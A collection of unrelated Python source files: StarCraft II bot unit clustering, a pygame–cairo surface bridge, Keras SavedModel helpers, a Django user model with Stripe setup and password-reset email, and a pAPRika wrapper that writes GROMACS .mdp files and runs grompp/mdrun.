status += f": {final_action.target.type_id.name}"
else:
status += f": {final_action.target}"
status += f" G: {group.debug_index}"
status += f"\n{move_type.name}"
pos3d: Point3 = unit.position3d
pos3d = Point3((pos3d.x, pos3d.y, pos3d.z + 2))
self.ai._client.debug_text_world(status, pos3d, size=10)
def closest_group(
self,
start: Point2,
combat_groups: List[CombatUnits],
group_center: Optional[Point2] = None,
distance: float = 50,
) -> Optional[CombatUnits]:
group = None
        best_distance = distance  # doesn't consider enemy groups farther away than this
if group_center is None:
group_center = start
for combat_group in combat_groups:
center = combat_group.center
if center == group_center:
continue # it's the same group!
distance = start.distance_to(center)
if distance < best_distance:
best_distance = distance
group = combat_group
return group
def group_own_units(self, units: Units) -> List[CombatUnits]:
groups: List[Units] = []
# import time
# ns_pf = time.perf_counter_ns()
numpy_vectors: List[np.ndarray] = []
for unit in units:
numpy_vectors.append(np.array([unit.position.x, unit.position.y]))
if numpy_vectors:
clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(numpy_vectors)
# print(clustering.labels_)
for index in range(0, len(clustering.labels_)):
unit = units[index]
if unit.type_id in self.unit_values.combat_ignore:
continue
label = clustering.labels_[index]
if label >= len(groups):
groups.append(Units([unit], self.ai))
else:
groups[label].append(unit)
# for label in clustering.labels_:
# ns_pf = time.perf_counter_ns() - ns_pf
# print(f"Own unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)} units: {len(units)}")
return [CombatUnits(u, self.knowledge) for u in groups]
def group_enemy_units(self) -> List[CombatUnits]:
groups: List[Units] = []
import time
ns_pf = time.perf_counter_ns()
if self.cache.enemy_numpy_vectors:
clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(self.cache.enemy_numpy_vectors)
# print(clustering.labels_)
units = self.ai.all_enemy_units
for index in range(0, len(clustering.labels_)):
unit = units[index]
if unit.type_id in self.unit_values.combat_ignore or not unit.can_be_attacked:
continue
label = clustering.labels_[index]
if label >= len(groups):
groups.append(Units([unit], self.ai))
else:
groups[label].append(unit)
# for label in clustering.labels_:
ns_pf = time.perf_counter_ns() - ns_pf
# print(f"Enemy unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)}")
return [CombatUnits(u, self.knowledge) for u in groups]
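# Standalone sketch of the DBSCAN grouping idea used by group_own_units/group_enemy_units above:
# positions closer than `eps` to a neighbour receive the same cluster label. The coordinates are
# made up and stand in for unit positions on the map.
if __name__ == "__main__":
    positions = np.array([[10.0, 10.0], [11.0, 10.5], [12.0, 9.5],   # three units close together
                          [40.0, 40.0], [41.5, 40.2]])               # two units far away from them
    labels = DBSCAN(eps=7, min_samples=1).fit(positions).labels_
    print(labels)  # e.g. [0 0 0 1 1] -> two combat groups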
|
nilq/baby-python
|
python
|
names = []
while True:
name = input()
if name == '.':
break
names.append(name)
print(names)
print(len(names))
|
nilq/baby-python
|
python
|
import ctypes
import cairo
from pygame.rect import Rect
def get_rect_by_size(upper_corner, size):
return Rect(*upper_corner, size, size)
PyBUF_READ = 0x100
PyBUF_WRITE = 0x200
def get_cairo_surface(pygame_surface):
""" Black magic. """
class Surface(ctypes.Structure):
        _fields_ = [
            ('HEAD', ctypes.c_byte * object.__basicsize__),
            ('SDL_Surface', ctypes.c_void_p)]
class SDL_Surface(ctypes.Structure):
        _fields_ = [
            ('flags', ctypes.c_uint),
            ('SDL_PixelFormat', ctypes.c_void_p),
            ('w', ctypes.c_int),
            ('h', ctypes.c_int),
            ('pitch', ctypes.c_ushort),
            ('pixels', ctypes.c_void_p)]
surface = Surface.from_address(id(pygame_surface))
ss = SDL_Surface.from_address(surface.SDL_Surface)
pixels_ptr = ctypes.pythonapi.PyMemoryView_FromMemory(ctypes.c_void_p(ss.pixels),
ss.pitch * ss.h,
PyBUF_WRITE)
pixels = ctypes.cast(pixels_ptr, ctypes.py_object).value
return cairo.ImageSurface.create_for_data(pixels, cairo.FORMAT_RGB24, ss.w, ss.h, ss.pitch)
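# Hedged usage sketch: wrap a pygame Surface and draw into its pixel buffer with cairo. This
# relies on the same SDL-era struct layout that the wrapper above assumes, so it may not work
# with every pygame build; the size, colour and output filename are arbitrary.
if __name__ == '__main__':
    import pygame
    pg_surface = pygame.Surface((200, 100), depth=32)
    ctx = cairo.Context(get_cairo_surface(pg_surface))
    ctx.set_source_rgb(0.2, 0.6, 0.9)   # light blue rectangle
    ctx.rectangle(10, 10, 80, 40)
    ctx.fill()
    pygame.image.save(pg_surface, "cairo_demo.png")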
|
nilq/baby-python
|
python
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions shared between SavedModel saving/loading implementations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util import tf_inspect
def use_wrapped_call(layer, call_fn):
"""Creates fn that adds the losses returned by call_fn & returns the outputs.
Args:
layer: A Keras layer object
call_fn: tf.function that takes layer inputs (and possibly a training arg),
and returns a tuple of (outputs, list of losses).
Returns:
function that calls call_fn and returns the outputs. Losses returned by
call_fn are added to the layer losses.
"""
training_arg_index = get_training_arg_index(layer)
def wrapped_call(inputs, *args, **kwargs):
"""Returns the outputs from the call_fn, and adds the losses."""
if layer._expects_training_arg: # pylint: disable=protected-access
training = get_training_arg(training_arg_index, args, kwargs)
if training is None:
training = K.learning_phase()
args = list(args)
kwargs = kwargs.copy()
def replace_training_and_call(training):
new_args, new_kwargs = set_training_arg(training, training_arg_index,
args, kwargs)
return call_fn(inputs, *new_args, **new_kwargs)
outputs, losses = tf_utils.smart_cond(
training,
lambda: replace_training_and_call(True),
lambda: replace_training_and_call(False))
else:
outputs, losses = call_fn(inputs)
layer.add_loss(losses, inputs)
return outputs
return wrapped_call
def get_training_arg_index(layer):
"""Returns the index of 'training' in the layer call function arguments.
Args:
layer: Keras layer
Returns:
- n: index of 'training' in the call function arguments.
- -1: if 'training' is not found in the arguments, but layer.call accepts
variable keyword arguments
- None: if layer doesn't expect a training argument.
"""
if not layer._expects_training_arg: # pylint: disable=protected-access
return None
arg_list = tf_inspect.getfullargspec(layer.call).args
if tf_inspect.ismethod(layer.call):
arg_list = arg_list[1:]
if 'training' in arg_list:
return arg_list.index('training')
else:
return -1
def set_training_arg(training, index, args, kwargs):
if index is None:
pass
elif index >= 0 and len(args) > index:
args[index] = training
else:
kwargs['training'] = training
return args, kwargs
def get_training_arg(index, args, kwargs):
if index is None:
return None
elif index >= 0 and len(args) > index:
return args[index]
else:
return kwargs.get('training', None)
|
nilq/baby-python
|
python
|
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.db.models import CharField
from django.db.models.signals import post_save
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.core.mail import EmailMultiAlternatives
from django.dispatch import receiver
from django.template.loader import render_to_string
from django_rest_passwordreset.signals import reset_password_token_created
import stripe
stripe.api_key = settings.STRIPE_SECRET_KEY
class User(AbstractUser):
"""
Default custom user model for mentors.
If adding fields that need to be filled at user signup,
check forms.SignupForm and forms.SocialSignupForms accordingly.
"""
#: First and last name do not cover name patterns around the globe
name = CharField(_("Name of User"), blank=True, max_length=255)
stripe_account_id = CharField(max_length=100)
stripe_customer_id = CharField(max_length=100)
def get_absolute_url(self):
"""Get url for user's detail view.
Returns:
str: URL for user detail.
"""
return reverse("users:detail", kwargs={"username": self.username})
def post_save_user_receiver(sender, instance, created, **kwargs):
if created:
instance.name = f"{instance.first_name} {instance.last_name}"
account = stripe.Account.create(
type='express',
)
instance.stripe_account_id = account["id"]
customer = stripe.Customer.create(
email=instance.email,
name=instance.name
)
instance.stripe_customer_id = customer["id"]
instance.save()
# Avoid circular import
from mentors.mentors.models import Mentor
Mentor.objects.create(user=instance)
post_save.connect(post_save_user_receiver, sender=User)
@receiver(reset_password_token_created)
def password_reset_token_created(sender, instance, reset_password_token, *args, **kwargs):
"""
Handles password reset tokens
When a token is created, an e-mail needs to be sent to the user
:param sender: View Class that sent the signal
:param instance: View Instance that sent the signal
:param reset_password_token: Token Model Object
:param args:
:param kwargs:
:return:
"""
# send an e-mail to the user
domain = "https://domain.com"
if settings.DEBUG:
domain = "http://localhost:3000"
reset_password_url = domain + '/accounts/reset-password/confirm/' + reset_password_token.key
context = {
'current_user': reset_password_token.user,
'username': reset_password_token.user.username,
'email': reset_password_token.user.email,
'reset_password_url': reset_password_url,
'domain': domain
}
# render email text
email_html_message = render_to_string('email/user_reset_password.html', context)
email_plaintext_message = render_to_string('email/user_reset_password.txt', context)
msg = EmailMultiAlternatives(
# title:
"Password Reset for {title}".format(title="Mentors"),
# message:
email_plaintext_message,
# from:
"noreply@somehost.local",
# to:
[reset_password_token.user.email]
)
msg.attach_alternative(email_html_message, "text/html")
msg.send()
|
nilq/baby-python
|
python
|
import numpy as np
class Neurons:
def __init__(self, n_inputs, n_neurons):
self.weights = 1 * np.random.randn(n_inputs, n_neurons)
self.biases = np.zeros((1, n_neurons))
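# Minimal forward-pass sketch for the layer above: outputs = inputs @ weights + biases.
# The input batch is made up; nothing below is part of the original snippet.
if __name__ == "__main__":
    np.random.seed(0)
    layer = Neurons(n_inputs=4, n_neurons=3)
    batch = np.random.randn(2, 4)              # 2 samples, 4 features each
    outputs = batch @ layer.weights + layer.biases
    print(outputs.shape)                        # (2, 3)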
|
nilq/baby-python
|
python
|
import abc
import glob
import logging
import os
import subprocess as sp
from collections import OrderedDict
from enum import Enum
from paprika.utils import get_dict_without_keys
from .simulation import Simulation
logger = logging.getLogger(__name__)
class GROMACS(Simulation, abc.ABC):
"""
A wrapper that can be used to set GROMACS simulation parameters.
.. todo ::
possibly modify this module to use the official python wrapper of GROMACS.
Below is an example of the configuration file (``gromacs.mdp``) generated by the wrapper. The class property
associated with defining the configuration variables is shown in brackets.
.. code ::
title = NPT MD Simulation ; [self.title]
; Run control [self.control]
nsteps = 1500000
nstxout = 500
nstlog = 500
nstenergy = 500
nstcalcenergy = 500
dt = 0.002
integrator = md
; Nonbonded options [self.nb_method]
cutoff-scheme = Verlet
ns_type = grid
nstlist = 10
rlist = 0.9
rcoulomb = 0.9
rvdw = 0.9
coulombtype = PME
pme_order = 4
fourierspacing = 0.16
vdwtype = Cut-off
DispCorr = EnerPres
pbc = xyz
; Bond constraints [self.constraints]
constraint-algorithm = lincs
constraints = h-bonds
lincs_iter = 1
lincs_order = 4
; Temperature coupling [self.thermostat]
tcoupl = v-rescale
tc-grps = System
ref_t = 298.15
tau_t = 0.1
gen_vel = no
; Pressure coupling [self.barostat]
pcoupl = Berendsen
pcoupltype = isotropic
tau_p = 2.0
ref_p = 1.01325
compressibility = 4.5e-05
"""
class Thermostat(Enum):
"""
        An enumeration of the different thermostats implemented in GROMACS.
"""
Off = "no"
Berendsen = "berendsen"
NoseHoover = "nose-hoover"
Andersen1 = "andersen"
Andersen2 = "andersen-massive"
VelocityRescaling = "v-rescale"
class Barostat(Enum):
"""
        An enumeration of the different barostats implemented in GROMACS.
"""
Off = "no"
Berendsen = "Berendsen"
ParrinelloRahman = "Parrinello-Rahman"
MMTK = "MTTK"
class Integrator(Enum):
"""
An enumeration of the different integrators implemented in GROMACS.
"""
LeapFrog = "md"
VelocityVerlet = "md-vv"
VelocityVerletAveK = "md-vv-avek"
LangevinDynamics = "sd"
BrownianDynamics = "bd"
class Optimizer(Enum):
"""
        An enumeration of the different minimization algorithms implemented in GROMACS.
"""
SteepestDescent = "steep"
ConjugateGradient = "cg"
Broyden = "l-bfgs"
class BoxScaling(Enum):
"""
An enumeration of the different PBC scaling options when running constant pressure simulations in GROMACS.
"""
Isotropic = "isotropic"
Semiisotropic = "semiisotropic"
Anisotropic = "anisotropic"
SurfaceTension = "surface-tension"
class Constraints(Enum):
"""
An enumeration of the different bond constraint options in GROMACS.
"""
Off = "none"
HBonds = "h-bonds"
AllBonds = "all-bonds"
HAngles = "h-angles"
AllAngles = "all-angles"
@property
def index_file(self) -> str:
"""os.PathLike: GROMACS index file that specifies ``groups`` in the system. This is optional in a GROMACS
simulation."""
return self._index_file
@index_file.setter
def index_file(self, value: str):
self._index_file = value
@property
def checkpoint(self) -> str:
"""os.PathLike: Checkpoint file (extension is ``.cpt``) for starting a simulation from a previous state."""
return self._checkpoint
@checkpoint.setter
def checkpoint(self, value: str):
self._checkpoint = value
@property
def control(self):
"""dict: Dictionary for the output control of the MD simulation (frequency of energy, trajectory etc)."""
return self._control
@control.setter
def control(self, value):
self._control = value
@property
def nb_method(self):
"""dict: Dictionary for the non-bonded method options (cutoffs and methods)."""
return self._nb_method
@nb_method.setter
def nb_method(self, value):
self._nb_method = value
@property
def constraints(self):
"""dict: Dictionary for the bond constraint options (LINCS or SHAKE)."""
return self._constraints
@constraints.setter
def constraints(self, value):
self._constraints = value
@property
def tc_groups(self) -> list:
"""
list: List of groups to apply thermostat "separately" based on the groups defined in the ``index_file``.
Below is an example of applying the thermostat for different groups separately in a GROMACS input file
.. code ::
tcoupl = v-rescale
tc-grps = HOST GUEST HOH
tau-t = 0.1 0.1 0.1
ref-t = 300 300 300
"""
return self._tc_groups
@tc_groups.setter
def tc_groups(self, value: list):
self._tc_groups = value
@property
def prefix(self):
"""str: The prefix for file names generated from this simulation."""
return self._prefix
@prefix.setter
def prefix(self, new_prefix):
self._prefix = new_prefix
self.input = new_prefix + ".mdp"
self.output = new_prefix + ".mdout"
self.logfile = new_prefix + ".log"
self.tpr = new_prefix + ".tpr"
@property
def custom_mdrun_command(self) -> str:
"""Custom commands for ``mdrun``. The default commands parsed to ``mdrun`` if all the variables are defined is
.. code::
gmx mdrun -deffnm ``prefix`` -nt ``n_threads`` -gpu_id ``gpu_devices`` -plumed ``plumed.dat``
        This is useful depending on how GROMACS was compiled, e.g. if GROMACS is compiled with the MPI library, then
        you will need to use the command below:
.. code::
mpirun -np 6 gmx_mpi mdrun -deffnm ``prefix`` -ntomp 1 -gpu_id 0 -plumed ``plumed.dat``
"""
return self._custom_mdrun_command
@custom_mdrun_command.setter
def custom_mdrun_command(self, value: str):
self._custom_mdrun_command = value
@property
def grompp_maxwarn(self) -> int:
"""int: Maximum number of warnings for GROMPP to ignore. default=1."""
return self._grompp_maxwarn
@grompp_maxwarn.setter
def grompp_maxwarn(self, value: int):
self._grompp_maxwarn = value
def __init__(self):
super().__init__()
# I/O
self._index_file = None
self._custom_mdrun_command = None
self._tc_groups = None
self._grompp_maxwarn = 1
# File names
self.input = self._prefix + ".mdp"
self.output = self._prefix + ".mdout"
self._checkpoint = None
self.logfile = self._prefix + ".log"
self.tpr = self._prefix + ".tpr"
# Input file
self._control = OrderedDict()
self._control["nsteps"] = 5000
self._control["nstxout"] = 500
self._control["nstlog"] = 500
self._control["nstenergy"] = 500
self._control["nstcalcenergy"] = 500
self._constraints = OrderedDict()
self._constraints["constraint-algorithm"] = "lincs"
self._constraints["constraints"] = self.Constraints.HBonds.value
self._constraints["lincs_iter"] = 1
self._constraints["lincs_order"] = 4
self._nb_method = OrderedDict()
self._nb_method["cutoff-scheme"] = "Verlet"
self._nb_method["ns-type"] = "grid"
self._nb_method["nstlist"] = 10
self._nb_method["rlist"] = 0.9
self._nb_method["rcoulomb"] = 0.9
self._nb_method["rvdw"] = 0.9
self._nb_method["coulombtype"] = "PME"
self._nb_method["pme_order"] = 4
self._nb_method["fourierspacing"] = 0.16
self._nb_method["vdwtype"] = "Cut-off"
self._nb_method["DispCorr"] = "EnerPres"
self._nb_method["pbc"] = "xyz"
def _config_min(self, optimizer):
"""
Configure input settings for a minimization run.
Parameters
----------
optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent
Algorithm for energy minimization; keywords in the parenthesis are the options for the input file.
**(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden`
(``l-bfgs``).
"""
self.constraints["continuation"] = "no"
self.control["integrator"] = optimizer.value
self.control["emtol"] = 10.0
self.control["emstep"] = 0.01
self.control["nsteps"] = 5000
def _config_md(self, integrator, thermostat):
"""
Configure input settings for an MD run.
Parameters
----------
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling
Option to choose one of five thermostats implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover`
(``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``),
and **(6)** `VelocityRescaling` (``v-rescale``).
"""
self.control["dt"] = 0.002
self.control["integrator"] = integrator.value
self.constraints["continuation"] = "yes"
self.thermostat["tc-grps"] = "System"
self.thermostat["ref_t"] = self.temperature
if (
integrator != self.Integrator.LangevinDynamics
and integrator != self.Integrator.BrownianDynamics
):
self.thermostat["tcoupl"] = thermostat.value
self.thermostat["tau_t"] = 1.0
else:
self.thermostat["tau_t"] = 0.1
def config_vac_min(self, optimizer=Optimizer.SteepestDescent):
"""
Configure a reasonable input setting for an energy minimization run in vacuum. `Users can override the parameters
set by this method.`
.. note ::
Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a
"pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you can do
using ``gmx editconf``. See the discussion on
https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2.
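One way to create such an expanded box (a sketch; ``gmx editconf`` and its ``-box`` flag are standard
GROMACS, the file names here are placeholders):
.. code ::
gmx editconf -f system.gro -o system_expanded.gro -box 99 99 99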
Parameters
----------
optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent
Algorithm for energy minimization; keywords in the parenthesis are the options for the input file.
**(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden`
(``l-bfgs``).
"""
self.title = "Vacuum Minimization"
self._config_min(optimizer)
self.nb_method["pbc"] = "xyz"
self.nb_method["ns_type"] = "grid"
self.nb_method["nstlist"] = 10
self.nb_method["rlist"] = 333.3
self.nb_method["coulombtype"] = "Cut-off"
self.nb_method["rcoulomb"] = 333.3
self.nb_method["vdwtype"] = "Cut-off"
self.nb_method["rvdw"] = 333.3
self.nb_method["DispCorr"] = "no"
def config_vac_md(
self, integrator=Integrator.LeapFrog, thermostat=Thermostat.VelocityRescaling
):
"""
Configure a reasonable input setting for an MD run in vacuum. `Users can override the parameters set by this
method.`
.. note ::
Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a
"pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you set
using ``gmx editconf``. See the discussion on
https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2.
Parameters
----------
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling
Option to choose one of five thermostats implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover`
(``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``),
and **(6)** `VelocityRescaling` (``v-rescale``).
"""
self.title = "Vacuum MD Simulation"
self._config_md(integrator, thermostat)
if self.checkpoint is None:
self.constraints["continuation"] = "no"
else:
self.constraints["continuation"] = "yes"
self.nb_method["pbc"] = "xyz"
self.nb_method["ns_type"] = "grid"
self.nb_method["nstlist"] = 10
self.nb_method["rlist"] = 333.3
self.nb_method["coulombtype"] = "Cut-off"
self.nb_method["rcoulomb"] = 333.3
self.nb_method["vdwtype"] = "Cut-off"
self.nb_method["rvdw"] = 333.3
self.nb_method["DispCorr"] = "no"
def config_pbc_min(self, optimizer=Optimizer.SteepestDescent):
"""
Configure a reasonable input setting for an energy minimization run with periodic boundary conditions. `Users
can override the parameters set by this method.`
Parameters
----------
optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent
Algorithm for energy minimization, keywords in the parenthesis are the options for the input file.
**(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden`
(``l-bfgs``).
"""
self.title = "PBC Minimization"
self._config_min(optimizer)
self.nb_method["nstlist"] = 10
def config_pbc_md(
self,
ensemble=Simulation.Ensemble.NPT,
integrator=Integrator.LeapFrog,
thermostat=Thermostat.VelocityRescaling,
barostat=Barostat.Berendsen,
):
"""
Configure a reasonable input setting for an MD run with periodic boundary conditions. `Users can override the
parameters set by this method.`
Parameters
----------
ensemble: :class:`Simulation.Ensemble`, default=Ensemble.NPT
Configure an MD simulation with the NVE, NVT or NPT thermodynamic ensemble.
integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog
Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the
input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``),
**(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)**
`Brownian Dynamics` (``bd``).
thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling
Option to choose one of five thermostats implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover`
(``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``),
and **(6)** `VelocityRescaling` (``v-rescale``).
barostat: :class:`GROMACS.Barostat`, default=Barostat.Berendsen
Option to choose one of three barostats implemented in GROMACS, keywords in the parenthesis are the options
for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `ParrinelloRahman`
(``Parrinello-Rahman``), and **(4)** `MMTK` (``MTTK``).
"""
self.title = f"{ensemble.value} MD Simulation"
self._config_md(integrator, thermostat)
if self.checkpoint is None:
self.constraints["continuation"] = "no"
else:
self.constraints["continuation"] = "yes"
if ensemble == self.Ensemble.NVE:
self.thermostat["tcoupl"] = self.Thermostat.Off.value
self.barostat["pcoupl"] = self.Barostat.Off.value
del self.thermostat["tc-grps"]
del self.thermostat["ref_t"]
del self.thermostat["tau_t"]
elif ensemble == self.Ensemble.NVT:
self.thermostat["gen_vel"] = "yes"
self.thermostat["gen_temp"] = self.temperature
self.thermostat["gen_seed"] = -1
self.barostat["pcoupl"] = self.Barostat.Off.value
elif ensemble == self.Ensemble.NPT:
self.thermostat["gen_vel"] = "no"
self.barostat["pcoupl"] = barostat.value
# Compare enum members directly: ``barostat.value`` is a string and would never equal the enum member.
if barostat != self.Barostat.Off:
self.barostat["pcoupltype"] = self.BoxScaling.Isotropic.value
self.barostat["tau_p"] = 2.0
self.barostat["ref_p"] = self.pressure
self.barostat["compressibility"] = 4.5e-5
@staticmethod
def _write_dict_to_mdp(f, dictionary):
"""
Write dictionary to file, following GROMACS format.
Parameters
----------
f : TextIO
File where the dictionary should be written.
dictionary : dict
Dictionary of values.
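For illustration, an entry ``{"nsteps": 5000}`` is written as the line ``nsteps = 5000`` (the key
left-justified to 25 characters), and a list value such as ``{"tc-grps": ["HOST", "GUEST"]}`` becomes
``tc-grps = HOST GUEST``.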
"""
for key, val in dictionary.items():
if val is not None and not isinstance(val, list):
f.write("{:25s} {:s}\n".format(key, "= " + str(val)))
elif isinstance(val, list):
f.write("{:25s} {:s}".format(key, "= "))
for i in val:
f.write("{:s} ".format(str(i)))
f.write("\n")
def _write_input_file(self):
"""
Write the input file specification to file.
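A minimal sketch of the generated layout (actual values depend on the configured dictionaries):
.. code ::
title                     = NPT MD Simulation
; Run control
nsteps                    = 5000
; Nonbonded options
cutoff-scheme             = Verlet
; Bond constraints
constraint-algorithm      = lincs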
"""
logger.debug("Writing {}".format(self.input))
with open(os.path.join(self.path, self.input), "w") as mdp:
mdp.write("{:25s} {:s}\n".format("title", "= " + self.title))
mdp.write("; Run control\n")
self._write_dict_to_mdp(mdp, self.control)
mdp.write("; Nonbonded options\n")
self._write_dict_to_mdp(mdp, self.nb_method)
mdp.write("; Bond constraints\n")
if self.constraints["constraint-algorithm"].lower() == "shake":
self._write_dict_to_mdp(
mdp,
get_dict_without_keys(
self.constraints, "lincs_iter", "lincs_order"
),
)
else:
self._write_dict_to_mdp(mdp, self.constraints)
if self.thermostat:
mdp.write("; Temperature coupling\n")
# Check if users specify different temperature groups
if self.tc_groups:
tau_t = self.thermostat["tau_t"]
self.thermostat["tc-grps"] = self.tc_groups
self.thermostat["tau_t"] = [tau_t] * len(self.tc_groups)
self.thermostat["ref_t"] = [self.temperature] * len(self.tc_groups)
self._write_dict_to_mdp(mdp, self.thermostat)
if self.barostat:
mdp.write("; Pressure coupling\n")
self._write_dict_to_mdp(mdp, self.barostat)
def run(self, run_grompp=True, overwrite=False, fail_ok=False):
"""
Method to run a molecular dynamics simulation with GROMACS.
Parameters
----------
run_grompp: bool, optional, default=True
Run GROMPP to generate the ``.tpr`` file before running MDRUN.
overwrite: bool, optional, default=False
Whether to overwrite simulation files.
fail_ok: bool, optional, default=False
Whether a failing simulation should stop execution of ``pAPRika``.
"""
if overwrite or not self.check_complete():
# Check the type of simulation: Minimization, NVT or NPT
if self.control["integrator"] in [
self.Optimizer.SteepestDescent.value,
self.Optimizer.ConjugateGradient.value,
self.Optimizer.Broyden.value,
]:
logger.info("Running Minimization at {}".format(self.path))
elif self.control["integrator"] in [
self.Integrator.LeapFrog.value,
self.Integrator.VelocityVerlet.value,
self.Integrator.VelocityVerletAveK.value,
self.Integrator.LangevinDynamics.value,
self.Integrator.BrownianDynamics.value,
]:
if self.thermostat and self.barostat:
logger.info("Running NPT MD at {}".format(self.path))
elif not self.barostat:
logger.info("Running NVT MD at {}".format(self.path))
else:
logger.info("Running NVE MD at {}".format(self.path))
# Set Plumed kernel library to path
self._set_plumed_kernel()
# create executable list for GROMPP
# gmx grompp -f npt.mdp -c coordinates.gro -p topology.top -t checkpoint.cpt -o npt.tpr -n index.ndx
if run_grompp:
# Clean previously generated files
for file in glob.glob(os.path.join(self.path, f"{self.prefix}*")):
os.remove(file)
# Write MDP input file
self._write_input_file()
# GROMPP list
grompp_list = [self.executable, "grompp"]
grompp_list += [
"-f",
self.input,
"-p",
self.topology,
"-c",
self.coordinates,
"-o",
self.tpr,
"-po",
self.output,
"-maxwarn",
str(self.grompp_maxwarn),
]
if self.checkpoint:
grompp_list += ["-t", self.checkpoint]
if self.index_file:
grompp_list += ["-n", self.index_file]
# Run GROMPP
grompp_output = sp.Popen(
grompp_list,
cwd=self.path,
stdout=sp.PIPE,
stderr=sp.PIPE,
env=os.environ,
)
grompp_stdout = grompp_output.stdout.read().splitlines()
grompp_stderr = grompp_output.stderr.read().splitlines()
# Report any stdout/stderr which are output from execution
if grompp_stdout:
logger.info("STDOUT received from GROMACS execution")
for line in grompp_stdout:
logger.info(line)
# GROMACS prints most of its informational "grompp" output to stderr, so only lines that
# actually contain "Error" are treated as errors here.
if grompp_stderr and any(
["Error" in line.decode("utf-8").strip() for line in grompp_stderr]
):
logger.info("STDERR received from GROMACS execution")
for line in grompp_stderr:
logger.error(line)
# create executable list for MDRUN
# gmx_mpi mdrun -v -deffnm npt -nt 6 -gpu_id 0 -plumed plumed.dat
mdrun_list = []
# Add any user specified command
if self.custom_mdrun_command is not None:
if self.executable not in self.custom_mdrun_command:
mdrun_list += [self.executable]
if "mdrun" not in self.custom_mdrun_command:
mdrun_list += ["mdrun"]
mdrun_list += self.custom_mdrun_command.split()
# Output prefix
if "-deffnm" not in self.custom_mdrun_command:
mdrun_list += ["-deffnm", self.prefix]
# Add number of threads if not already specified in custom
if not any(
[
cpu in self.custom_mdrun_command
for cpu in ["-nt", "-ntomp", "-ntmpi", "-ntomp_pme"]
]
):
mdrun_list += [
"-ntomp" if "mpi" in self.executable else "-nt",
str(self.n_threads),
]
# Add gpu id if not already specified in custom
if (
self.gpu_devices is not None
and "-gpu_id" not in self.custom_mdrun_command
):
mdrun_list += ["-gpu_id", str(self.gpu_devices)]
# Add plumed file if not already specified in custom
if self.plumed_file and "-plumed" not in self.custom_mdrun_command:
mdrun_list += ["-plumed", self.plumed_file]
else:
mdrun_list += [self.executable, "mdrun", "-deffnm", self.prefix]
# Add number of threads
mdrun_list += [
"-ntomp" if "mpi" in self.executable else "-nt",
str(self.n_threads),
]
# Add gpu id
if self.gpu_devices is not None:
mdrun_list += ["-gpu_id", str(self.gpu_devices)]
# Add plumed file
if self.plumed_file is not None:
mdrun_list += ["-plumed", self.plumed_file]
# Run MDRUN
mdrun_output = sp.Popen(
mdrun_list,
cwd=self.path,
stdout=sp.PIPE,
stderr=sp.PIPE,
env=os.environ,
)
mdrun_out = mdrun_output.stdout.read().splitlines()
mdrun_err = mdrun_output.stderr.read().splitlines()
